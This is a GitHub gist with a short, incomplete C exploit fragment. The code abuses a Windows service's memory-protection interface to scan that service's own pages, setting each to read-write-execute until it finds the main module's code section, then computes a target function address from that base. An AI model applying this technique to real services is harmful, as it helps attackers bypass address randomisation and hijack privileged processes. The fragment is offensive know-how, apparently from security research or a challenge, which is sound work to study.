Last active
February 6, 2019 00:37
-
-
Save SouhailHammou/68ea8b26c738fbbb050969f911a94c0f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/; | |
| for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 ) | |
| { | |
| Page_cp = Page; | |
| OldProtection = CommunicateServiceVirtualProtect( | |
| pid, //We give the service its own pid | |
| Page, //Address of the page in the service's process | |
| PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes | |
| 0x1000 | |
| ); | |
| if ( OldProtection == -1 ) //Invalid page | |
| continue; | |
| if ( OldProtection == PAGE_EXECUTE_READ ) | |
| { | |
| //this is the main module's .text section | |
| Base = Page - 0x1000; | |
| Page = 0x7fffefff; //to break after restoring the old protection | |
| } | |
| //restore the old protection | |
| CommunicateServiceVirtualProtect( | |
| pid, | |
| Page_cp, | |
| OldProtection, | |
| 0x1000 | |
| ); | |
| } | |
| //Use the base to calculate the function address | |
| pFunc = Base + FuncOffset; | |
| //.... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment